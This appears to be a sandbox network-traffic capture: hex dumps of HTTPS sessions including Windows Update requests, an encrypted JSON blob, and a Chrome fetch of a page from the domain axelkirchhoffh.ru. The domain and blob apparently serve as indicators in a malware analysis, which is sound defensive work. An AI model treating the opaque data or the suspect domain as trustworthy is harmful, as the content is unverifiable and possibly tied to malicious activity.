                                                                          2024-10-29 15:51:41 UTC514INData Raw: 32 37 38 34 0d 0a 7b 22 61 22 3a 22 73 41 68 43 31 39 61 7a 7a 56 4f 57 43 4d 37 32 30 76 36 77 7a 50 74 41 2b 4b 6d 4e 66 79 6d 62 66 6d 55 55 44 67 6a 4b 4e 35 6a 4a 6a 6f 46 52 53 64 71 76 78 55 56 6b 52 6a 42 32 36 6b 4e 72 77 61 43 63 44 32 52 4c 54 43 66 43 5c 2f 54 67 53 4c 58 58 31 61 72 73 7a 41 35 4e 54 6c 4b 6f 61 70 49 7a 69 57 68 72 5a 63 79 37 75 4a 73 69 49 4d 65 4c 53 37 4a 6c 59 4f 76 4c 70 56 64 44 42 32 6b 45 36 47 36 53 5c 2f 65 75 65 44 73 47 51 52 65 4e 44 5a 42 59 2b 44 43 50 72 69 57 59 63 53 50 6d 43 31 36 6c 4d 49 35 6f 46 2b 73 63 6a 49 31 39 68 42 36 70 74 30 78 2b 48 70 43 69 66 49 2b 5c 2f 4e 7a 59 78 4f 7a 56 74 51 69 56 45 56 6a 30 52 5a 38 47 2b 34 63 42 48 78 38 77 6c 68 5c 2f 53 44 37 42 66 66 79 6e 77 4e 78 65 4b 6a 73
                                                                          Data Ascii: 2784{"a":"sAhC19azzVOWCM720v6wzPtA+KmNfymbfmUUDgjKN5jJjoFRSdqvxUVkRjB26kNrwaCcD2RLTCfC\/TgSLXX1arszA5NTlKoapIziWhrZcy7uJsiIMeLS7JlYOvLpVdDB2kE6G6S\/eueDsGQReNDZBY+DCPriWYcSPmC16lMI5oF+scjI19hB6pt0x+HpCifI+\/NzYxOzVtQiVEVj0RZ8G+4cBHx8wlh\/SD7BffynwNxeKjs
                                                                          2024-10-29 15:51:41 UTC1369INData Raw: 7a 34 6d 2b 34 74 68 6d 6a 37 5c 2f 47 5a 47 70 5c 2f 6d 77 41 32 50 36 63 4f 54 73 33 71 4d 6c 33 45 30 6c 32 72 75 53 48 47 38 57 56 49 34 57 44 69 47 35 59 4f 65 46 69 4b 66 56 35 6a 67 43 5c 2f 48 71 34 56 67 59 52 67 72 67 32 7a 41 52 4d 7a 5a 41 32 68 38 38 7a 4c 53 51 4d 48 4c 6d 63 61 55 79 39 56 49 38 38 44 44 2b 67 74 68 42 73 6b 34 30 65 50 32 72 70 66 52 2b 37 62 35 68 4b 65 77 47 43 48 6c 69 50 30 70 52 66 61 47 58 64 46 58 56 43 32 72 5c 2f 4f 6e 71 6d 70 69 63 4f 4d 7a 43 4b 69 33 4b 73 42 76 33 33 45 34 56 6f 34 6b 6f 38 6c 4e 7a 59 70 65 59 52 5c 2f 73 62 78 31 33 6f 6c 33 74 2b 32 64 32 2b 38 5c 2f 41 6c 7a 58 4f 38 67 58 59 39 65 66 70 52 37 79 4b 33 4a 33 43 75 37 64 54 32 69 73 4b 59 6b 79 45 4d 51 48 68 48 50 73 33 30 4e 37 44 78 6a
                                                                          Data Ascii: z4m+4thmj7\/GZGp\/mwA2P6cOTs3qMl3E0l2ruSHG8WVI4WDiG5YOeFiKfV5jgC\/Hq4VgYRgrg2zARMzZA2h88zLSQMHLmcaUy9VI88DD+gthBsk40eP2rpfR+7b5hKewGCHliP0pRfaGXdFXVC2r\/OnqmpicOMzCKi3KsBv33E4Vo4ko8lNzYpeYR\/sbx13ol3t+2d2+8\/AlzXO8gXY9efpR7yK3J3Cu7dT2isKYkyEMQHhHPs30N7Dxj
                                                                          2024-10-29 15:51:41 UTC1369INData Raw: 57 66 6a 35 68 6a 5c 2f 50 51 2b 35 42 32 78 36 75 51 76 6e 52 6a 65 32 5c 2f 6b 38 62 34 5c 2f 4e 52 59 31 69 5a 59 46 4e 38 4d 6e 7a 4f 36 41 37 32 74 35 47 4e 4c 46 7a 35 6a 66 74 45 69 5a 30 64 6e 68 6a 4e 51 7a 5c 2f 33 65 70 56 59 62 47 61 72 55 67 54 79 6e 39 32 61 35 32 6a 30 39 6a 35 56 4e 77 34 57 66 32 72 7a 62 77 5c 2f 77 77 43 78 6b 5a 73 76 35 36 30 78 50 32 6b 79 7a 4c 69 69 59 6e 76 78 2b 52 70 75 42 71 37 64 71 73 75 5a 54 49 70 44 63 79 41 72 6a 58 4d 77 47 34 33 6b 50 42 72 77 75 66 71 52 73 59 51 6a 50 70 6f 72 73 37 61 36 71 6d 35 5c 2f 61 36 56 65 70 4d 48 50 61 4b 45 43 32 53 72 76 31 50 34 69 65 69 36 75 78 4c 62 74 6b 46 52 46 5a 49 69 64 75 48 78 58 39 4b 46 45 4b 37 74 2b 61 75 68 6b 61 41 52 33 43 75 6e 4b 48 69 6d 43 66 30 6e
                                                                          Data Ascii: Wfj5hj\/PQ+5B2x6uQvnRje2\/k8b4\/NRY1iZYFN8MnzO6A72t5GNLFz5jftEiZ0dnhjNQz\/3epVYbGarUgTyn92a52j09j5VNw4Wf2rzbw\/wwCxkZsv560xP2kyzLiiYnvx+RpuBq7dqsuZTIpDcyArjXMwG43kPBrwufqRsYQjPpors7a6qm5\/a6VepMHPaKEC2Srv1P4iei6uxLbtkFRFZIiduHxX9KFEK7t+auhkaAR3CunKHimCf0n
                                                                          2024-10-29 15:51:41 UTC1369INData Raw: 6f 48 37 71 75 7a 51 56 61 6b 41 57 52 66 6b 33 6c 69 50 4c 5a 65 45 54 59 36 4d 64 66 68 2b 44 68 36 53 4c 41 57 52 4a 42 4b 58 48 35 59 68 38 49 4c 42 66 38 53 57 6e 58 4a 2b 42 46 4a 35 35 5a 32 65 6c 54 77 69 64 41 42 64 6b 50 64 6b 62 4d 68 73 51 6b 70 34 6a 6f 49 35 78 4d 44 67 69 5a 59 45 66 33 55 79 77 37 50 41 4e 5a 69 51 36 6b 46 59 35 46 64 72 41 66 35 51 6b 6d 4f 2b 30 56 5c 2f 31 71 70 44 78 62 2b 2b 6d 4a 4c 42 52 58 72 75 5a 5a 34 7a 2b 59 79 78 68 53 38 56 6b 61 62 5c 2f 50 43 34 79 49 4e 55 58 6b 50 44 59 6a 56 59 72 37 53 38 69 73 4b 68 79 67 2b 4b 49 49 57 64 71 6f 4a 77 46 6e 66 6a 44 45 35 49 4b 6a 49 4c 4a 59 4e 52 59 31 71 72 43 71 77 66 4b 68 70 70 62 6a 64 42 2b 61 47 32 64 67 6b 70 64 37 79 72 70 49 71 59 70 2b 5a 4d 5a 67 56 68
                                                                          Data Ascii: oH7quzQVakAWRfk3liPLZeETY6Mdfh+Dh6SLAWRJBKXH5Yh8ILBf8SWnXJ+BFJ55Z2elTwidABdkPdkbMhsQkp4joI5xMDgiZYEf3Uyw7PANZiQ6kFY5FdrAf5QkmO+0V\/1qpDxb++mJLBRXruZZ4z+YyxhS8Vkab\/PC4yINUXkPDYjVYr7S8isKhyg+KIIWdqoJwFnfjDE5IKjILJYNRY1qrCqwfKhppbjdB+aG2dgkpd7yrpIqYp+ZMZgVh
                                                                          2024-10-29 15:51:41 UTC1369INData Raw: 6d 37 51 49 52 4c 45 6d 54 67 69 5a 45 4f 75 6e 61 62 39 77 54 65 33 31 76 77 6c 69 6b 4b 6e 43 30 4d 6a 4b 71 44 79 59 38 37 54 79 6d 6b 41 5c 2f 44 6f 6a 4f 46 55 34 62 36 7a 6d 49 66 4b 73 6c 55 5c 2f 33 4b 56 73 30 61 42 62 52 59 75 33 33 39 57 54 42 4c 79 47 2b 72 48 79 59 2b 36 55 4a 65 4b 68 56 61 51 43 4d 75 52 35 50 63 33 63 78 74 78 41 4a 32 42 5a 4c 31 6f 51 35 77 55 73 79 73 6b 2b 34 70 36 67 53 62 34 5a 65 37 50 69 6e 72 5c 2f 37 57 54 2b 7a 56 42 33 77 67 63 55 61 6d 2b 31 59 4c 6f 42 54 31 54 74 6b 6d 6c 45 63 71 66 30 34 79 46 70 39 72 41 59 69 57 48 34 41 6e 6e 37 6d 52 6a 37 68 32 4f 43 55 62 32 4f 5a 36 33 34 76 56 41 6b 42 59 46 68 75 73 6c 6f 74 55 6e 35 46 77 74 39 77 6a 72 4d 69 70 59 6e 70 66 42 56 50 63 76 5a 2b 73 65 6f 5c 2f 6a
                                                                          Data Ascii: m7QIRLEmTgiZEOunab9wTe31vwlikKnC0MjKqDyY87TymkA\/DojOFU4b6zmIfKslU\/3KVs0aBbRYu339WTBLyG+rHyY+6UJeKhVaQCMuR5Pc3cxtxAJ2BZL1oQ5wUsysk+4p6gSb4Ze7Pinr\/7WT+zVB3wgcUam+1YLoBT1TtkmlEcqf04yFp9rAYiWH4Ann7mRj7h2OCUb2OZ634vVAkBYFhuslotUn5Fwt9wjrMipYnpfBVPcvZ+seo\/j
                                                                          2024-10-29 15:51:41 UTC1369INData Raw: 50 77 5a 4d 48 78 66 79 6f 37 42 56 2b 6c 69 30 76 32 78 74 36 43 48 7a 72 32 33 4c 35 43 58 46 69 5c 2f 64 42 68 72 6e 68 62 50 69 73 71 30 42 30 6f 30 78 58 4c 52 69 36 68 39 4b 69 43 77 36 68 63 72 43 64 52 62 41 72 45 42 53 6f 52 51 38 35 34 50 4e 44 58 54 35 77 5a 49 45 78 68 58 79 50 63 79 61 45 47 34 44 6d 49 45 55 34 46 4b 6f 71 68 59 2b 74 6d 35 39 4e 2b 74 4e 39 67 39 5a 45 4a 5c 2f 35 71 43 6c 71 46 6d 36 38 75 67 5c 2f 79 62 57 33 6d 51 62 55 55 6f 77 56 49 51 4d 56 67 71 4f 75 71 7a 67 36 33 2b 71 44 6a 50 34 6d 33 30 53 4d 7a 70 48 36 76 4b 5c 2f 74 73 67 76 71 62 5c 2f 53 4c 51 41 47 56 44 54 5a 38 39 51 57 5c 2f 4a 54 38 4f 45 4a 51 58 65 32 5a 44 55 79 6d 67 4f 63 76 55 69 43 73 71 43 71 4a 46 66 30 74 73 45 73 4f 63 66 6f 47 44 48 6f 73
                                                                          Data Ascii: PwZMHxfyo7BV+li0v2xt6CHzr23L5CXFi\/dBhrnhbPisq0B0o0xXLRi6h9KiCw6hcrCdRbArEBSoRQ854PNDXT5wZIExhXyPcyaEG4DmIEU4FKoqhY+tm59N+tN9g9ZEJ\/5qClqFm68ug\/ybW3mQbUUowVIQMVgqOuqzg63+qDjP4m30SMzpH6vK\/tsgvqb\/SLQAGVDTZ89QW\/JT8OEJQXe2ZDUymgOcvUiCsqCqJFf0tsEsOcfoGDHos
                                                                          2024-10-29 15:51:41 UTC1369INData Raw: 54 6b 67 4e 30 46 68 4b 2b 73 5a 36 77 51 34 65 59 5c 2f 43 65 46 79 31 4c 32 65 79 31 48 71 4f 74 38 49 64 44 78 32 7a 67 32 31 42 67 48 4f 33 48 51 2b 6b 7a 39 31 79 54 78 6d 6a 77 36 58 31 35 63 6f 59 4c 67 34 75 4a 37 62 2b 76 41 6a 59 52 69 70 79 49 6c 43 76 53 62 68 59 65 38 41 5a 30 61 37 6c 57 68 66 6b 66 6f 69 2b 52 4c 2b 4e 6e 6f 66 46 7a 75 47 46 55 2b 6d 76 68 6e 50 68 61 35 75 4a 33 30 66 35 4c 78 61 4e 6c 74 71 61 52 78 31 52 70 48 69 53 5a 42 33 30 68 30 41 46 74 70 78 2b 78 69 77 69 78 70 74 47 33 6b 41 5c 2f 55 4f 4f 6a 4f 4d 42 39 51 6b 63 64 54 68 57 63 49 65 39 55 5c 2f 6e 75 6e 55 50 39 45 39 67 5a 6c 57 48 6b 58 7a 4f 78 52 31 6a 70 49 32 34 69 66 4a 4b 64 49 4b 71 64 42 74 36 6b 47 51 66 67 41 66 44 35 65 52 61 65 57 6d 41 57 52 4c
                                                                          Data Ascii: TkgN0FhK+sZ6wQ4eY\/CeFy1L2ey1HqOt8IdDx2zg21BgHO3HQ+kz91yTxmjw6X15coYLg4uJ7b+vAjYRipyIlCvSbhYe8AZ0a7lWhfkfoi+RL+NnofFzuGFU+mvhnPha5uJ30f5LxaNltqaRx1RpHiSZB30h0AFtpx+xiwixptG3kA\/UOOjOMB9QkcdThWcIe9U\/nunUP9E9gZlWHkXzOxR1jpI24ifJKdIKqdBt6kGQfgAfD5eRaeWmAWRL
                                                                          2024-10-29 15:51:41 UTC1369INData Raw: 34 69 70 5a 4c 70 74 57 5a 4d 79 30 67 48 66 54 58 44 4b 63 6b 79 6f 54 6f 78 74 65 55 42 44 51 6f 45 45 64 44 42 62 73 49 73 4c 38 37 78 6e 36 73 79 6c 70 6f 47 36 79 65 51 4c 49 56 4a 39 4e 52 50 5a 46 30 75 71 32 31 70 6b 35 4d 64 57 79 78 47 51 38 35 66 6d 57 48 37 73 54 78 64 5c 2f 39 34 37 4d 43 6e 6d 5a 79 6a 46 47 63 58 34 6d 35 6d 58 74 37 78 37 52 66 57 4d 52 50 72 56 5a 65 68 5c 2f 50 52 37 58 38 45 63 42 63 39 42 62 66 4b 73 42 4d 62 41 69 55 41 62 4a 4e 30 5c 2f 42 30 49 51 66 6b 42 6a 6f 44 35 4a 6c 6f 79 43 5a 71 2b 78 6e 48 6f 42 64 51 34 47 39 36 5c 2f 68 67 38 63 59 52 66 6a 33 45 47 76 47 42 75 73 73 31 30 5c 2f 33 6a 34 58 78 6a 63 53 68 54 42 33 62 77 7a 68 75 65 76 5c 2f 5c 2f 4f 68 77 69 59 2b 6d 68 31 55 55 6e 4a 56 53 6a 45 64 76
                                                                          Data Ascii: 4ipZLptWZMy0gHfTXDKckyoToxteUBDQoEEdDBbsIsL87xn6sylpoG6yeQLIVJ9NRPZF0uq21pk5MdWyxGQ85fmWH7sTxd\/947MCnmZyjFGcX4m5mXt7x7RfWMRPrVZeh\/PR7X8EcBc9BbfKsBMbAiUAbJN0\/B0IQfkBjoD5JloyCZq+xnHoBdQ4G96\/hg8cYRfj3EGvGBuss10\/3j4XxjcShTB3bwzhuev\/\/OhwiY+mh1UUnJVSjEdv
                                                                          2024-10-29 15:51:41 UTC27INData Raw: 22 2c 22 64 22 3a 22 36 33 36 31 36 63 36 31 36 64 36 39 36 65 36 35 22 7d 0d 0a
                                                                          Data Ascii: ","d":"63616c616d696e65"}


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          26192.168.2.164926520.242.39.171443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:51:09 UTC142OUTGET /clientwebservice/ping HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          User-Agent: DNS resiliency checker/1.0
                                                                          Host: fe3cr.delivery.mp.microsoft.com
                                                                          2024-10-29 15:51:09 UTC234INHTTP/1.1 200 OK
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Expires: -1
                                                                          Server: Microsoft-IIS/10.0
                                                                          X-Powered-By: ASP.NET
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Tue, 29 Oct 2024 15:51:09 GMT
                                                                          Connection: close
                                                                          Content-Length: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          27192.168.2.16492664.175.87.197443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:51:11 UTC124OUTGET /sls/ping HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          User-Agent: DNS resiliency checker/1.0
                                                                          Host: slscr.update.microsoft.com
                                                                          2024-10-29 15:51:11 UTC318INHTTP/1.1 200 OK
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Expires: -1
                                                                          MS-CV: GOXn4kcMiEOZymws.0
                                                                          MS-RequestId: b09f6e0e-3480-40b6-9bf2-262fc5012d6d
                                                                          MS-CorrelationId: aae2fee5-3954-482e-95b2-d73a35e50bf7
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Tue, 29 Oct 2024 15:51:10 GMT
                                                                          Connection: close
                                                                          Content-Length: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          28192.168.2.16492674.175.87.197443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:51:13 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vkpk6RKulBtWzZ8&MD=S66ulWUE HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                          Host: slscr.update.microsoft.com
                                                                          2024-10-29 15:51:14 UTC560INHTTP/1.1 200 OK
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/octet-stream
                                                                          Expires: -1
                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                          MS-CorrelationId: c1ddf576-9661-4db9-80ce-e2c1def151f6
                                                                          MS-RequestId: d8ffe85f-d2fb-4bf3-b67a-319cc2ef0cd5
                                                                          MS-CV: CDmrzhyUtESRpIal.0
                                                                          X-Microsoft-SLSClientCache: 2880
                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Tue, 29 Oct 2024 15:51:13 GMT
                                                                          Connection: close
                                                                          Content-Length: 24490
                                                                          2024-10-29 15:51:14 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                          2024-10-29 15:51:14 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          29192.168.2.16492694.175.87.197443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:51:15 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vkpk6RKulBtWzZ8&MD=S66ulWUE HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                          Host: slscr.update.microsoft.com
                                                                          2024-10-29 15:51:15 UTC560INHTTP/1.1 200 OK
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/octet-stream
                                                                          Expires: -1
                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                          MS-CorrelationId: 75008388-bc01-42c8-aecb-180d4c45264e
                                                                          MS-RequestId: 85249c01-b6f3-4f05-999e-dc618b3db671
                                                                          MS-CV: zmzBH0PrQ0C5Qbrd.0
                                                                          X-Microsoft-SLSClientCache: 1440
                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Tue, 29 Oct 2024 15:51:15 GMT
                                                                          Connection: close
                                                                          Content-Length: 30005
                                                                          2024-10-29 15:51:15 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                          2024-10-29 15:51:15 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                          Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          30192.168.2.1649270188.114.96.34436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:51:42 UTC342OUTGET // HTTP/1.1
                                                                          Host: axelkirchhoffh.ru
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:52:39 UTC853INHTTP/1.1 200 OK
                                                                          Date: Tue, 29 Oct 2024 15:52:39 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          x-powered-by: PHP/7.3.33
                                                                          access-control-allow-origin: *
                                                                          vary: Accept-Encoding
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B6sZay3AueBlXXwGZxmUCh4%2B7tsQ0Ny1PpF6J8jGt%2Fx3kqWA6Bm5jqSBKNmdjuzWZaKx0q71tfppAQw79GVxM4oyLRryD7kk2YLvckdSxwYK2AftH%2BBwlj%2FsBc6D1mO9PxIUpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8da454180c296b94-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1106&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=920&delivery_rate=2324237&cwnd=239&unsent_bytes=0&cid=79135e66bc28a96c&ts=57930&x=0"
                                                                          2024-10-29 15:52:39 UTC516INData Raw: 31 64 39 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 75 74 75 72 69 73 74 69 63 20 43 6c 61 73
                                                                          Data Ascii: 1d98<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noarchive, nosnippet, noindex, nofollow"> <title>Futuristic Clas
                                                                          2024-10-29 15:52:39 UTC1369INData Raw: 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 6c 67 20 6e 61 76 62 61 72 2d 64 61 72 6b 20 62 67 2d 64 61 72 6b 20 73 74 69 63 6b 79 2d 74 6f 70 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 66 77 2d 62 6f 6c 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 78 65 6c 6b 69 72 63 68 68 6f 66 66 68 2e 72 75 2f 2f 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 63 61 72 22 3e 3c 2f 69 3e 20 46 75 74 75 72 69 73 74 69 63 20 43 6c 61 73 73 69 63 73 20 43 6c 75 62 20
                                                                          Data Ascii: ad><body><nav class="navbar navbar-expand-lg navbar-dark bg-dark sticky-top"> <div class="container"> <a class="navbar-brand fw-bold" href="https://axelkirchhoffh.ru//"> <i class="fas fa-car"></i> Futuristic Classics Club
